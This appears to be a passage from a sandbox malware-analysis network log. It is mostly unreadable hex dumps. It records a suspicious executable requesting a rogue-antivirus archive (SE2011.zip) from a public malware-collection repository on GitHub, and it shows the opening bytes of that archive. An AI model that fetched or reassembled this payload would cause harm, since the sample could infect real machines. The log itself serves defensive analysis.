                                                                                                                                                            2022-09-29 12:45:23 UTC32238INData Raw: d0 bb e3 4c 4d 66 ac f4 00 a4 f9 c1 38 06 55 42 a5 bf 09 bd 76 00 34 6f 82 af 0d 63 09 38 73 60 3b 53 0d 7e 1b 41 8d d0 f3 12 89 e8 c8 4e 4e d7 a4 0b 2d 87 ca 6f 63 80 f3 12 16 bc 26 f1 1c d2 d1 ff c8 75 67 8d dc 97 6d 7d e2 ed 6b 1c d5 21 f7 3c 74 1e 8c 5b 57 e7 17 69 5f f1 6d 39 0c 17 d0 3d 37 be bd 71 84 76 e9 6b cf 3e 6d 8b ec 9f 3e cf 3f 05 d9 4b 1a e7 62 c4 bf 25 7f 02 6c da c3 92 ba 57 a0 b7 56 4f 33 8b 5e ea 81 e7 4f 85 b5 08 52 6c 2b f0 0b 37 13 da d3 6c 0c 47 dc cd 3a 0f db 82 20 2e d5 e4 ad 21 fd 9f 41 a9 bf 10 e9 65 c3 89 3f 26 6e 19 cb 85 b1 43 96 ea 90 ea ac c3 8f 21 0f a6 50 a0 fa 9c a1 ba 44 5c f3 58 b5 43 bb 8e a3 a9 70 0b 5f 10 3b a1 80 02 a8 b3 12 bc a4 32 61 c2 1f 8e af 30 ae 40 d0 a9 51 4f c7 43 28 70 6f a2 5a d0 7c f6 50 15 0c 9b 35
                                                                                                                                                            Data Ascii: LMf8UBv4oc8s`;S~ANN-oc&ugm}k!<t[Wi_m9=7qvk>m>?Kb%lWVO3^ORl+7lG: .!Ae?&nC!PD\XCp_;2a0@QOC(poZ|P5
                                                                                                                                                            2022-09-29 12:45:23 UTC32254INData Raw: b8 0d 6a 7e 12 31 67 d7 3b e9 e5 04 cb 9b 4d e6 1d a7 aa b9 e1 63 d5 a4 6b dd 50 8c 64 4a 07 6d 1a 3a 78 24 1b b7 3a b5 dd 9e d1 5e 03 4b 73 90 e9 73 3e 74 7a dc 10 76 63 c2 eb e0 76 a0 48 d0 e9 c2 c9 31 3e b5 74 1e 6d c5 6e 3b b0 db a8 c3 1d 5e 8c 31 c3 70 88 74 9a fe d4 74 aa b7 09 8c d2 b9 2d 50 3c 0f 01 fe 7a cb 90 ff 13 6b 8f 33 9f 35 67 93 c8 0e 53 64 67 11 73 80 b5 7f 4a bd ec 52 62 44 77 23 bd 4c f5 fe 73 cd 81 1f a9 45 c4 02 6a 28 a6 74 a0 94 42 a2 c3 11 e9 56 9b cf 8d f7 d9 00 5c 61 85 7c 0c 1b fa d2 21 b4 0c 24 03 ed 3a f8 fc 5d 76 d7 8e d5 8c 0c b2 08 7b d9 a4 bb fe 9d e4 29 8d b8 07 14 72 25 9d db b4 89 32 53 e2 7a 61 07 69 8e e0 89 55 95 ce 77 41 7f d7 0d d7 ee bf 68 6d f3 8d d7 6b 7d 91 01 32 e7 36 1c 85 56 cf 2e 7c c4 bc ad 92 25 1f 8e 6e
                                                                                                                                                            Data Ascii: j~1g;MckPdJm:x$:^Kss>tzvcvH1>tmn;^1ptt-P<zk35gSdgsJRbDw#LsEj(tBV\a|!$:]v{)r%2SzaiUwAhmk}26V.|%n
                                                                                                                                                            2022-09-29 12:45:23 UTC32270INData Raw: 1c 82 0e d6 c5 ad cd 62 83 a1 0a 78 12 93 ee 8b 86 da 92 59 df 53 46 2f bb 0d 0c 1d 10 7f 62 1b 8d ff ad d0 33 30 85 0c 5c 2c 7f a9 6d b2 89 de 6e 7f 67 81 c2 10 2b c7 ee 10 b9 b3 3e 3b cc 77 b0 46 f4 da 2a e5 3f 7d 21 6b ef 3e 03 70 62 ee 33 21 84 70 55 5a 18 40 c9 ab 69 d1 53 b4 73 ec 3a b5 d6 13 20 68 cf d1 63 9f 07 2b a5 6f bb 99 3b 92 76 d7 9e 9e 72 78 1f cf e9 0b fa 87 43 f9 39 65 dd f3 ab c6 7d 85 62 46 34 1e 38 cc 5e 7f 7a 4a db b6 10 09 cc a4 58 5c b5 c2 e3 a0 b2 d4 84 ed bf 4e 0a e4 0d 0e 3d c7 ac 10 22 7e 44 ee 3a 23 05 45 92 99 81 1c c1 3e d6 5a d8 41 b0 34 db 0e b3 ad 65 05 6a 48 b0 c6 94 8a c0 4c 4b 97 a1 b8 82 e0 7f 20 f2 df b3 af c3 b3 f9 2c db 4e 42 a7 3f fe b5 83 91 6f 73 c1 30 91 27 24 ac 4f 57 da 9b 52 a6 e3 01 50 d1 a8 ae b0 d1 bc 82
                                                                                                                                                            Data Ascii: bxYSF/b30\,mng+>;wF*?}!k>pb3!pUZ@iSs: hc+o;vrxC9e}bF48^zJX\N="~D:#E>ZA4ejHLK ,NB?os0'$OWRP
                                                                                                                                                            2022-09-29 12:45:23 UTC32286INData Raw: 16 a5 59 3a be f6 55 35 3f 4f 45 e4 30 4f fc 8b e2 0a 9a 27 b5 0b 32 0e ba b6 03 5b c6 a3 aa 3b 2c 1d 02 a4 de 9b 6e 40 22 b5 2f e5 f9 c0 e2 f1 b4 7a 3d df c6 ab 25 93 7d 57 97 11 53 6a 4b 06 89 bc 14 d5 8f 5b a4 c7 7e d0 d0 a0 46 b4 c7 92 4c ea e4 f7 52 e3 9d ab e2 48 69 45 97 fc fc b4 96 42 89 20 dd 5e ef e3 86 02 56 55 ab 06 22 4a e9 28 0d 85 a2 20 17 85 0a 1f 83 26 7c c6 48 68 83 79 cf 4f c2 73 87 c1 c6 18 5c b2 ac b7 c0 ca 2f 98 43 fc be 13 b6 40 2a 31 aa 4a 15 87 4d a6 17 1c 70 ff a5 a9 5e 4e 62 5e 8a bb 8f 81 6f ae 1e 4e b8 eb 4b ef 60 d8 0f 8b f1 44 6e 3f e3 44 8d 07 a7 86 a9 4e ed 4b 4e dc 80 91 eb 66 34 b5 a6 b4 ec d2 14 f0 2f b1 23 45 ba f1 db 03 3c 91 44 5f eb 8f 0c d2 91 2d 0d dd 43 ce 63 aa cf 4e a6 30 3b 07 35 90 a5 00 b5 03 50 2e 4b 6e 0f
                                                                                                                                                            Data Ascii: Y:U5?OE0O'2[;,n@"/z=%}WSjK[~FLRHiEB ^VU"J( &|HhyOs\/C@*1JMp^Nb^oNK`Dn?DNKNf4/#E<D_-CcN0;5P.Kn
                                                                                                                                                            2022-09-29 12:45:23 UTC32302INData Raw: 7f a2 76 b2 93 08 5f 0f 1e 1f cb fd e2 b0 3e 1e ba 6f b1 2b 37 68 c6 0a 87 48 89 93 de 3e 3a 38 88 ce 2f 95 5e 9a 1e 49 46 b5 ad fc e2 0b 70 53 1b ac 4f db ce 07 bf 17 72 1b 8d b2 03 46 1b 55 0c 02 06 ec 78 80 2a 72 a1 5f e4 f4 30 9e 64 46 53 7a dd 77 8f 83 d5 6d d4 20 d6 2c a4 a1 44 ec 01 7b 38 12 21 15 ab 34 19 28 90 6b 9b 89 4b 71 9a 57 7a 42 cf 78 dc 56 e8 82 f6 c9 40 ae 7b 33 f4 6d 1a b8 36 2d 01 31 9c 29 27 17 3c ba 8e e8 8f d3 42 21 85 18 16 ae 2a e5 d8 09 f7 77 3c 5e 78 75 2b 4e e3 84 24 b1 82 2c 82 74 48 57 7f 24 16 cf 5b fd ee ac 67 27 51 24 84 5b 2c 81 22 33 5e c4 fe 4b c0 45 e2 04 c6 cd 19 1a 5d f2 0f 23 01 8a 40 04 d9 fc 8a 42 d2 81 44 a6 dd f8 24 4c 6d 77 18 bd a7 e7 dd 33 73 64 92 dd 45 da 48 04 37 25 4f 5f df 90 89 d9 89 f0 79 ed 55 1e cd
                                                                                                                                                            Data Ascii: v_>o+7hH>:8/^IFpSOrFUx*r_0dFSzwm ,D{8!4(kKqWzBxV@{3m6-1)'<B!*w<^xu+N$,tHW$[g'Q$[,"3^KE]#@BD$Lmw3sdEH7%O_yU
                                                                                                                                                            2022-09-29 12:45:23 UTC32318INData Raw: fd 77 9b 2f a5 4f c8 a4 ea 53 db f0 c4 ca 3b 9a 9c 05 d8 34 cd 52 d5 6a 19 27 3f 43 a5 a3 aa 22 9d e3 cc 30 f9 e3 22 c4 c3 40 cb 0e cc c0 0f 37 7a ec 54 c6 8b e1 d5 45 d8 53 c0 1b 41 ff 0d e8 f4 e1 a5 6d e2 96 49 0e ed e4 49 26 bf 77 81 d8 4a 16 81 cc 40 18 e7 a4 c3 5f 7d d2 6b 72 2a 0b 18 88 58 63 d8 df a5 3d 1f c3 44 9f 6f b7 a7 2b 3e b6 a5 ec 1d 99 f8 d8 36 41 3b 40 4e b5 7e 81 5f 93 76 28 dc 7a e8 a7 39 54 46 d4 fc 9f e8 bd 9d 1e da e5 d3 62 e9 96 7b 75 d4 32 6d 53 67 1f df 97 ae 59 bf 19 c1 8d 1b 8f 0c ff 26 a0 cf e4 60 36 80 0d 3d fb 5c e6 4b 04 05 0d 2b 43 d2 8a 77 36 92 98 f5 97 87 12 7d 85 1d 22 4b 2b 5d 5d 68 60 34 16 b8 cd a6 24 b8 4c 7f b0 ad 79 e3 81 41 09 45 f8 29 62 7e 70 58 d4 59 19 54 f1 4f 99 75 18 ea e9 28 0d dc 97 6f fe c6 a7 51 47 f2
                                                                                                                                                            Data Ascii: w/OS;4Rj'?C"0"@7zTESAmII&wJ@_}kr*Xc=Do+>6A;@N~_v(z9TFb{u2mSgY&`6=\K+Cw6}"K+]]h`4$LyAE)b~pXYTOu(oQG
                                                                                                                                                            2022-09-29 12:45:23 UTC32334INData Raw: a5 1b ff 5b 4a fa 9b 15 ff c5 7b 24 2b 38 99 d4 44 d6 e0 a5 f2 a7 ec e4 47 31 ba 65 c9 08 dc 0d ca ca 57 3a 97 a7 d7 28 9b b7 c9 cd d5 60 3f c3 5a 37 b0 be ca 89 f8 a6 78 32 26 e3 00 95 f9 20 1e 42 53 47 a8 7e 27 8a 2d c4 c2 ee a8 17 0b bc 34 ce fc b7 8b 23 fe 34 41 d0 cc d2 d1 b7 6b 46 46 40 77 3d cd c8 91 87 32 18 3a fe b8 dd 99 47 30 4b 9d 2b aa 0a 0d e9 47 0f 9f 09 7f 6f be 73 1f bd b9 8c e2 fb 79 51 c8 32 27 ed c1 55 e1 3d be 32 29 4b a6 a9 4e aa f1 a4 35 b0 73 d3 3b fb 68 e6 da 48 92 fa 78 18 9a 02 1c 63 14 58 99 c1 35 01 34 83 6e 09 33 6b 5a c9 e3 50 f3 ba 85 c8 a1 94 24 32 7c f3 43 c7 79 c6 19 fd 67 d2 38 68 88 2d a3 91 85 39 52 1b 2b 8f e4 78 1f fe 28 2e 4e 95 2e ac 7f 17 e9 da 2f 5f 4d 54 f2 f0 fb ef 3d 79 dc 0b 19 54 87 2c c5 5d 47 86 60 35 8c
                                                                                                                                                            Data Ascii: [J{$+8DG1eW:(`?Z7x2& BSG~'-4#4AkFF@w=2:G0K+GosyQ2'U=2)KN5s;hHxcX54n3kZP$2|Cyg8h-9R+x(.N./_MT=yT,]G`5
                                                                                                                                                            2022-09-29 12:45:23 UTC32350INData Raw: ce fd 05 4c 2e 4b ba d6 ea c3 ed 6f c1 5f 3f d4 28 de 73 28 db 44 60 e9 a3 3f 3c 8d 8d a2 5e 7f aa 2d 98 80 65 cf 1d 86 cf 23 dc 61 bb e3 d4 ce 28 1b 54 04 75 5a 4b 0c d4 cf 5f 26 b2 24 cb 3f 84 98 1b 9c 52 2f 06 39 eb 44 53 1b 7a 56 df ea 09 7d a7 aa a8 fd dc e3 e6 3c 85 96 c2 2c dc 39 48 15 89 93 db a9 f1 67 8d 4c 84 8a 05 8c 59 21 59 4c 08 40 c5 ab cd 20 7f 16 44 b4 c1 14 cd 07 73 45 c4 e0 ac da 79 70 30 88 bb 41 d3 db 5a f6 72 1e 1a 54 d8 44 dd 89 5d c1 d4 8b d9 17 3d 08 fd 92 ed e5 da fb 2c ed ee 6d d6 b3 da 96 63 01 f0 57 26 88 ac 3d ff f3 1a 00 5b fd ec b5 52 b6 db 90 d1 43 a9 a2 e4 ad df 88 c2 8e bf 36 ef fb 24 71 f3 11 a9 8b 9d 05 26 7a 66 0e 14 97 99 67 46 87 a2 43 9a aa 90 4c 75 4d 79 16 e7 c2 70 4e 91 45 4e a5 85 6e 0b 2d be 87 ae 1c 1a 94 bb
                                                                                                                                                            Data Ascii: L.Ko_?(s(D`?<^-e#a(TuZK_&$?R/9DSzV}<,9HgLY!YL@ DsEyp0AZrTD]=,mcW&=[RC6$q&zfgFCLuMypNENn-
                                                                                                                                                            2022-09-29 12:45:23 UTC32366INData Raw: c8 97 c1 77 a5 43 7c 22 88 7a 02 07 fa f9 a9 9c 08 f4 e9 da 71 21 cc 03 b5 8a a3 b3 7e ba 67 ca 52 27 5c e4 96 74 d6 ab 27 71 81 b4 97 9e f3 6f b9 2b 10 42 4a 33 44 2f a4 11 21 ab fa c7 30 da a8 1e 8f 16 ec 64 43 06 83 7e cf 19 37 4f 77 16 46 84 51 dd a3 78 71 3c bb 63 1d 96 1d 83 7c d4 12 01 da 08 36 ff 54 b5 26 e2 2d 3f c1 89 eb 02 26 ba 4e 1c ef ac 92 78 25 33 c3 78 f8 68 ad 56 f9 c4 71 aa 0e c3 39 4c b3 8c 26 e7 2c 2c 63 55 ad fc 48 a7 fd 7d d1 f1 21 f5 28 59 3e e4 4a 55 52 3e d1 7d aa ae d5 73 49 c6 74 38 d1 5d 0c 6f a9 7d dc 17 85 0d 68 5b 8c 00 24 8d b7 49 2c f2 6f c8 47 6c f4 63 ff 25 ff 01 3f 26 26 b6 43 37 f1 d1 d9 90 4f 60 86 07 7d d5 64 9c 86 2b eb 51 09 3a 5b 72 a2 05 a6 56 0b 56 76 3b ec 8a db 97 80 0f 47 5b 2d f1 a3 88 2f 90 c2 b2 9e 4f ae
                                                                                                                                                            Data Ascii: wC|"zq!~gR'\t'qo+BJ3D/!0dC~7OwFQxq<c|6T&-?&Nx%3xhVq9L&,,cUH}!(Y>JUR>}sIt8]o}h[$I,oGlc%?&&C7O`}d+Q:[rVVv;G[-/O


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            122192.168.2.649769140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:24 UTC32378OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            123140.82.121.4443192.168.2.649769C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:24 UTC32378INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:24 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SE2011.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:24 UTC32379INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            124192.168.2.649770185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:24 UTC32380OUTGET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            125185.199.110.133443192.168.2.649770C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:24 UTC32380INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 2265879
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "68ce3eb817247cbdbb38d4d0c5fd8556ae42a26c8fa1d29d892506084cacec7d"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0809:045E:1D0478:1EA7B3:63359364
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:24 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6949-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455525.618231,VS0,VE284
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 0f97fb08d8bd33265af6de9c16ce00591065e81f
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:24 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:24 UTC32381INData Raw: 50 4b 03 04 33 00 01 00 63 00 66 ab 98 43 00 00 00 00 51 92 22 00 00 76 26 00 15 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 45 32 30 31 31 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 2f 34 9b fa 53 72 7f f2 f8 28 ea ed e3 98 44 e9 3e 6e 80 5c d8 f8 81 cc 55 93 6d 4a ed 13 7c 3f c6 ea ed 1d 23 c4 cc c5 59 61 c9 93 9b 12 c2 35 1a 29 ef 86 ea a8 23 3c 8f 24 e8 49 51 59 0d a0 55 6e 83 ee 2a f4 20 43 2e 76 ca 10 21 46 9e 5e c0 8f 4b fb a0 b4 56 79 2a ee 69 3f 22 60 14 f9 e3 80 b0 b4 96 3e 89 c0 8d 99 55 cc db e8 98 23 fc 62 f3 5a e5 9e 76 1e 7f b1 b0 a6 25 c9 a1 98 36 fc 01 9c 82 e9 9c 37 a6 e6 26 99 9f 26 8c 4a e9 be 31 b5 3e 6c b3 31 e7 73 5d da 4b ac 18 9d cf 11 8f cc 7e f2 a0 39 84 32 8d 4c 15 e9 9c d7 e1 a7 4e a5 ed 94 5f 06 5f 11 5e ad 80 08 33 09 bf
                                                                                                                                                            Data Ascii: PK3cfCQ"v&Endermanch@SE2011.exeAE/4Sr(D>n\UmJ|?#Ya5)#<$IQYUn* C.v!F^KVy*i?"`>U#bZv%67&&J1>l1s]K~92LN__^3
                                                                                                                                                            2022-09-29 12:45:24 UTC32397INData Raw: 9e 24 d7 89 2a 11 a2 c8 af 18 ac 25 24 05 fe dc 94 79 c8 16 47 ac f9 3d b7 f3 85 a3 b7 b3 63 00 8f 11 e0 e3 15 b1 f0 4d 17 a6 95 7b 13 a4 c8 12 23 b0 55 1d 6f fc 8e 47 98 9a 30 e0 95 c9 5d 76 d8 fc da 4e dc c4 cb 74 4c 56 9b 42 b7 a5 46 e3 82 c4 fd 31 32 36 95 8c 56 da f5 a9 6f a9 05 2a 52 e0 f5 e1 81 0e db 3a 10 08 7e 21 15 30 ad c6 69 7d b5 3a 5c c4 9a 4c fe f0 92 e3 dd 0c b9 31 1d b7 79 05 0a 6b 12 2a 01 49 fb bb d7 00 3a a1 12 25 47 41 38 31 54 b6 8a 70 e6 80 49 f3 22 6c 58 9f 94 3d cb 06 74 a1 bb 8f dc 73 a2 f0 cf ae af 54 9e 3b c6 0b 9a 08 77 36 e8 06 a8 ca de d2 c9 6d e7 66 7a 8f 1e 6f c9 e6 cb 2e 44 9a 30 96 d6 11 c2 06 8d 44 68 e3 68 b9 c5 06 8c 07 67 45 7b e3 67 27 b7 dc c7 d0 e2 09 dd ae 90 a0 e7 4c e9 09 c1 c9 49 b9 c6 85 d9 18 b0 97 38 78 1a
                                                                                                                                                            Data Ascii: $*%$yG=cM{#UoG0]vNtLVBF126Vo*R:~!0i}:\L1yk*I:%GA81TpI"lX=tsT;w6mfzo.D0DhhgE{g'LI8x
                                                                                                                                                            2022-09-29 12:45:24 UTC32413INData Raw: d2 f8 df c2 e2 65 2a a7 3a f5 17 67 06 b4 66 93 99 a1 22 2c ce 24 df 7f 75 76 f8 6a 40 a9 59 0c db 0e 5c 01 6d 85 59 9e e4 6d 95 08 57 ae 39 d0 06 d7 e3 25 1d 32 fc 27 e5 53 1a dc 10 97 66 6c 77 44 f2 42 71 0c 1e d2 60 94 88 9d 9b 15 b9 0b f3 d6 45 30 20 9e 02 25 74 69 a1 03 42 aa b5 d5 fc 66 c5 f8 31 6b c1 24 67 93 5f db 49 92 50 57 b2 31 20 ac c4 c8 82 bd 38 36 a5 c8 86 88 a5 1e 0e db 10 2e 26 16 28 79 a4 d5 40 a0 f1 e0 d5 92 95 82 c6 89 f4 61 33 39 a8 a5 8f 3f e0 cb c0 7e 9c ae 88 e0 eb 43 b7 3a a5 c7 ed 94 85 9f f3 39 42 b6 e0 de 12 c2 4c 1d a3 b7 5c 39 ec e7 c1 84 02 6c 52 75 53 08 ff 4a 29 10 1d cb 0b f3 97 39 d0 32 12 15 38 14 d7 77 5d ce 47 f7 45 c3 3c 58 b3 ff 20 a9 2a 30 0a 83 8d 1d cf 0d 5e 6f 47 c1 78 63 f0 e9 55 d8 4e 79 ef 7f 30 05 17 2f 44
                                                                                                                                                            Data Ascii: e*:gf",$uvj@Y\mYmW9%2'SflwDBq`E0 %tiBf1k$g_IPW1 86.&(y@a39?~C:9BL\9lRuSJ)928w]GE<X *0^oGxcUNy0/D
                                                                                                                                                            2022-09-29 12:45:24 UTC32429INData Raw: 4b b1 d5 59 93 86 86 e8 50 78 cb bd 1b 2c 01 ce 69 c9 03 a1 f7 23 30 7a 6e c5 dd f8 9a b0 2d 81 77 26 8e 28 c0 08 7c ff c1 07 de 9b 15 f9 0a be 8b 03 15 da 02 eb 1d 07 39 2f c6 d1 f0 56 ee e7 4f d9 5e 06 20 03 cb ab 9d 45 2c 2b aa fb 83 9d 28 a1 0b 44 47 1c 29 64 ac b5 cc b6 ad 72 e3 a2 e0 a0 c6 40 51 e9 f8 89 16 d8 4b 07 d5 61 14 cb 02 25 c7 3d b1 61 f6 47 46 cd 4f 75 d0 35 b5 85 c0 dc 86 3a 33 2b bb 16 34 7c 6b db 64 06 02 f7 b8 c7 cf 99 96 9b 7f a8 eb d0 0f 8e 98 fa c8 64 01 1c e1 7b 5e e4 23 98 8b 43 88 e3 18 b2 fd 1f 2e c2 b1 8d e3 9a 93 e1 88 4f 32 7b 1c d9 03 d3 00 57 8c dd 3e c0 4f f7 1e 16 f3 fd 51 5d 3d 2c 13 0f 75 46 2f 34 24 67 3d c9 cb b7 f7 9b 23 57 79 b4 8f fb c4 3d ab 1b 57 7c 39 3a 7a c7 0c 02 5e 72 cc 6d 57 de b2 c8 f3 bd 3c a1 d3 a5 f9
                                                                                                                                                            Data Ascii: KYPx,i#0zn-w&(|9/VO^ E,+(DG)dr@QKa%=aGFOu5:3+4|kdd{^#C.O2{W>OQ]=,uF/4$g=#Wy=W|9:z^rmW<
                                                                                                                                                            2022-09-29 12:45:24 UTC32445INData Raw: c6 85 c3 08 43 d9 df a1 72 2c 3b 16 51 79 a0 e5 dd 3d f3 cc f7 9a 01 48 84 cd c8 7a 91 92 cc ce 57 d0 6a 86 7d 3b 7b ed 34 1f 8e 99 6c 00 ff 45 7e 07 95 ed fd 95 99 6f 89 c5 81 fd 94 f8 4c 6a 38 df 71 c1 86 9f 24 e9 c7 41 c4 69 e3 96 fa ac 8d cc 49 1f 34 24 52 3e 8c d6 20 5f 21 a7 72 19 aa c3 31 13 29 51 15 89 41 02 d8 bb 95 1b f4 61 92 ae 49 c7 1c c6 1a f0 91 c2 da 72 86 e8 53 fc 7c 2e a2 02 e2 79 11 a5 6a 1a ae 40 b3 fb 8e 2b a2 94 3d 87 3e ea 7e 08 54 a8 07 bb 74 7a 8a 46 06 52 24 70 28 9b 23 bb aa b7 1b 36 c1 ea 17 d7 7f 7b 7a 7d 2d 30 14 cc 49 3b 86 3e 4c 6a 0a fd a4 e8 be c5 86 00 2b 56 7d 43 11 0a cc b9 bb 20 e2 8c f7 e2 80 36 d5 51 02 29 b5 0d 58 78 3d 5b 1b d4 e9 43 42 74 b7 ad 3f 0c ac b1 0d 08 37 10 7d aa f3 86 cc 78 48 2d 94 b8 68 3c e3 77 ea
                                                                                                                                                            Data Ascii: Cr,;Qy=HzWj};{4lE~oLj8q$AiI4$R> _!r1)QAaIrS|.yj@+=>~TtzFR$p(#6{z}-0I;>Lj+V}C 6Q)Xx=[CBt?7}xH-h<w
                                                                                                                                                            2022-09-29 12:45:24 UTC32461INData Raw: f6 a1 11 e9 28 2f 80 50 fd 1e 11 cb 64 b0 a8 69 2b 64 63 ad 88 8b d7 49 a1 41 47 22 51 7b 70 05 a8 55 c9 76 12 0d 96 28 c9 e0 b4 52 f0 a8 0f d0 dd 88 d6 cf 20 aa 48 45 bf 32 8b 5d 2c 52 c4 ac 2c a2 51 4a 10 72 4c 5c fd 44 2f c6 94 c2 39 51 7d 63 6a 5c 66 01 e4 0d a8 73 1a 77 db a5 56 57 68 4d 21 e8 56 ff a7 41 ab f8 99 30 77 93 7d bf 49 95 e1 ae f9 d7 a6 62 7a 1a ad d4 52 97 cf db da ac 84 37 56 0d 53 c6 60 f8 cf 1b 27 e9 d2 f8 26 2c e4 a9 68 4c 42 db f1 df 58 5f e3 5c 09 32 28 53 a5 a9 15 4b 67 8c 2f 0d d7 9a 14 a7 c3 49 95 79 63 1d fe 34 09 5a 62 88 58 c9 0a c5 9e b6 93 53 a1 43 2d 03 e6 a8 86 55 da 4b 32 c3 4e 78 35 e1 48 8d 9f bb cf 07 07 0a 0e bb ac 40 6a 74 9e c7 7b 11 b0 ac 20 ba 94 6b d6 3c 4a f8 b0 89 77 4f 9d 05 78 8f a3 f1 33 2f 4a 8e b7 8c d3
                                                                                                                                                            Data Ascii: (/Pdi+dcIAG"Q{pUv(R HE2],R,QJrL\D/9Q}cj\fswVWhM!VA0w}IbzR7VS`'&,hLBX_\2(SKg/Iyc4ZbXSC-UK2Nx5H@jt{ k<JwOx3/J
                                                                                                                                                            2022-09-29 12:45:24 UTC32477INData Raw: 31 1f 17 28 9b 03 21 31 fe 35 f9 ae 3d 65 82 60 56 f0 f7 fe 79 fe f9 3b 52 5e 68 1e 7b 9a 3b ce 63 2e 28 4d c8 03 98 45 27 46 25 aa 44 91 e3 4a 10 8f f9 39 33 3b b2 ad 55 6c 09 e1 6d 96 55 5c 04 aa 5c 4b 6e c1 b0 c1 55 e8 83 5a 51 c9 38 f6 62 6d c9 9e f4 e9 b4 ae e3 d7 f9 73 40 eb bf 8d f2 4c d0 5e 37 80 4d d8 49 08 78 f3 1a e6 50 82 1a d8 a9 24 23 d0 98 08 7f a9 cb 57 7b 1a 52 99 a0 1a 4e bf 0a 6a 2e 86 9d f4 7e 05 f2 aa f5 ca 1d bc 96 d1 c7 33 68 eb d9 a9 c7 d7 fc 43 68 b8 6a f9 e6 ca 16 9f fe bd 1e 55 5e 49 52 a2 64 68 90 8f 3f 6d 51 95 12 85 20 94 c5 29 4f 69 fd be b2 5e d1 cb 44 9a 2f cd 29 55 6f 47 81 82 34 07 f4 bc f2 74 44 3b db c0 21 1e 37 be e8 33 f1 5b 75 d2 a6 92 23 9e 7b 4f c7 0b 6a bc 37 31 eb ce f9 05 48 94 07 71 a3 c0 4d 7b 5b 8b 5b 81 61
